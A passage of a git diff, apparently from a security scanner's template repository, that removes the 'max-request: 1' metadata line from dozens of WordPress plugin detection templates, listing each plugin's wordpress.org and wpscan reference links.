a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - 